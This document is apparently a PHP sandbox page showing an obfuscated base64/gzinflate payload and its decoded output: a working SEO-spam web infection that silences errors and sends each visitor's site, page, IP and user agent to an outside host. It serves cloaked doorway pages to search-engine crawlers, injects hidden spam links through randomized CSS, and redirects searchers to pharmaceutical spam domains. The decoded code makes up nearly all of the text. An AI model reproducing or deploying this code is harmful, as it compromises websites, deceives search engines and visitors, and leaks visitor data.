<?php
echo(gzinflate(base64_decode("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")));
- Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.20, 7.2.6 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
- @error_reporting(0);
$client_ip = array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : '';
if(!$client_ip) $client_ip=$_SERVER["REMOTE_ADDR"];
$client_ip = preg_replace('/.*unknown,\s*/', '', $client_ip);
$showop_php = "showop.php";
define('originalipRtzxQ', $client_ip);
define('cdomainRtzxQ', "ssl-backup24.com");
define('rdomainRtzxQ', "ssl-check24.com");
define('gt_phpRtzxQ', "gt.php");
define('redir_phpRtzxQ', "redir.php");
function fetch_urlRtzxQ($url) {
if( function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$content =file_get_contents($url);
elseif( function_exists('curl_init')){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
$content = $out;
}
else{
if(!preg_match('/^http(s){0,1}:\/\/(.*?)\//', $url, $matches)) {
return('');
}
$domain = $matches[2];
$fp = fsockopen($domain, 80, $errno, $errstr, 30);
if(!$fp)
return('');
$req = "GET $url HTTP/1.0\r\n\r\n";
fwrite($fp, $req);
$out = '';
while(!feof($fp)) {
$out .= fgets($fp, 256);
}
$content = substr($out, strpos($out, "\r\n\r\n")+4);
}
return($content);
}
function ob_include_handlerRtzxQ($buffer, $phase) {
$deflated = false;
$content = $buffer;
if(function_exists('gzinflate')){
$inf = @gzinflate(substr($buffer,10,-8));
if($inf !== false){
$content = $inf;
$deflated = true;
}
}
//--------------------------------------------------------------------------------
$outsourceurl="http://".cdomainRtzxQ."/".gt_phpRtzxQ."?site=".urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode(originalipRtzxQ).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
$links_content = base64_decode(preg_replace('/<script.*?<\/script>/s', '', fetch_urlRtzxQ($outsourceurl)));
if(preg_match("/<a.*?>/is", $content)){
preg_match_all("/<a.*?>.*?<\/a>/is", $links_content, $matches);
$links = $matches[0];
$comment = '';
if(preg_match("/<!--.*?-->/s", $links_content, $matches))
$comment = $matches[0];
function anchor($data) {
if(!preg_match("/<img/i", $data[2]))
return "<!-- link_".$GLOBALS['__i']++." -->".$data[0];
}
srand(crc32($outsourceurl));
for ($class_name = '', $i = 0, $z = strlen($a = 'abcdefghijklmnopqrstuvwxyz0123456789')-1; $i != 8; $x = rand(0,$z), $class_name .= $a{$x}, $i++);
// TODO: what is it ?
$GLOBALS['__i'] = 0;
$content = preg_replace_callback("/<a(.*?)>(.*?)<\/a>/is", "anchor", $content);
$i = $GLOBALS['__i'];
if($i >= count($links)) {
for($k=0;$k<count($links);$k++) {
$links[$k] = preg_replace("/<a/", "<a class='$class_name'", $links[$k]);
$content = preg_replace("/<!-- link_$k -->/s", $links[$k]. ' ', $content );
}
}
else {
$n_links = round(count($links)/$i);
for($k=0;$k<$i;$k++){
$out_content = '';
for($p=0;$p<$n_links;$p++)
if(($k*$n_links+$p) < count($links)){
$links[$k*$n_links+$p] = preg_replace("/<a/i", "<a class='$class_name'", $links[$k*$n_links+$p]);
$out_content .= $links[$k*$n_links+$p];
}
$content = preg_replace("/<!-- link_$k -->/s", $out_content. ' ', $content );
}
}
$content = preg_replace("/<!-- link_(\d+) -->/s", '', $content);
$hide_methods = array("display: none", "visibility: hidden", "text-indent:5000px", "position: absolute; left: 7000px; top: 0px", "position:absolute; left:4000px");
$css = $hide_methods[array_rand($hide_methods)];
if(preg_match("/<head/i", $content)) {
$content = preg_replace("/(<head.*?>)/is", "$1$comment\n<style>\n.$class_name\t{\n\t$css;\n}\n</style>", $content);
}
elseif(preg_match("/<html/i", $content)) {
$content = preg_replace("/(<html.*?>)/is", "$1$comment\n<style>\n.$class_name\t{\n\t$css;\n}\n</style>", $content);
}
else
$content = preg_replace("/^/", "$comment<style>\n.$class_name\t{\n\t$css;\n}\n</style>", $content);
}
else {
if (preg_match('/<body.*?>/i',$content)) {
$content=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $content);
$content=preg_replace('/(<body.*?>)/is', "$1$links_content", $content, 1);
}
elseif (preg_match('/<\/body>/i',$content)) {
$content=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $content);
$content=preg_replace('/(<\/body>)/i', "$links_content$1", $content, 1);
}
}
//--------------------------------------------------------------------------------
if($deflated)
$content = gzencode($content);
$clen = strlen($content);
@header("Content-Length: $clen");
return $content;
}
if(!array_key_exists('HTTP_USER_AGENT', $_SERVER))
$_SERVER['HTTP_USER_AGENT'] = '';
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
if(!defined('FCONTENT_PROC') && preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"])){
define('FCONTENT_PROC',1);
$outsourceurl="http://".cdomainRtzxQ."/$showop_php?page=$page";
// trying to get doorway
$out=fetch_urlRtzxQ($outsourceurl);
$out=preg_replace('/<script.*?<\/script>/s', '', $out);
if ($out!="" and $out!="1" and !preg_match('/^\s+$/s', $out)) { // doorway exists
header('Cache-Control: no-cache, no-store, must-revalidate');
$out = preg_replace('/UA-1497692-16/', '', $out);
print $out;
exit;
}
// Doorway not exists. Getting links.
header('Cache-Control: no-cache, no-store, must-revalidate');
ob_start('ob_include_handlerRtzxQ');
}
if(isset($_SERVER["HTTP_REFERER"]) && preg_match('/live|msn|bing|yahoo|google|aol/', $_SERVER["HTTP_REFERER"]) && !preg_match("/^(000000000000)/", originalipRtzxQ)) {
if(array_key_exists('HTTP_CHECKER', $_SERVER) && $_SERVER['HTTP_CHECKER'] == '9bcf0edc75944b260de8279d7a6d8174')
$page = base64_encode($_SERVER['HTTP_CHECKER']);
else
$page = base64_encode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
$tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia');
$niche='noref';
foreach($tabs as $tab) {
if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
$niche = $tab;
}
}
if($niche != 'noref') {
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header("Location: http://".rdomainRtzxQ."/r.pl?niche=$niche&page=$page&ref=".urlencode($_SERVER["HTTP_REFERER"]));
exit;
}
$tag = $_SERVER["HTTP_HOST"];
if(preg_match("/^www\./", $tag))
$tag = preg_replace( "/^www\.(.*)$/", "$1", $tag);
$tag = substr(strtolower(base64_encode($tag)), 0, 5);
if(preg_match("/$tag/", $_SERVER["REQUEST_URI"]) or preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"])) {
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header("Location: http://".rdomainRtzxQ."/r.pl?niche=nch&page=$page&ref=".urlencode($_SERVER["HTTP_REFERER"]));
exit;
}
$outsourceurl="http://".cdomainRtzxQ."/".redir_phpRtzxQ."?page=$page";
$out=fetch_urlRtzxQ($outsourceurl);
$out=preg_replace('/\s*<script.*?<\/script>\s*/s', '', $out);
if($out == '1') {
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header("Location: http://".rdomainRtzxQ."/r.pl?niche=$niche&page=$page&ref=".urlencode($_SERVER["HTTP_REFERER"]));
exit;
}
}
preferences:
276.6 ms | 422 KiB | 310 Q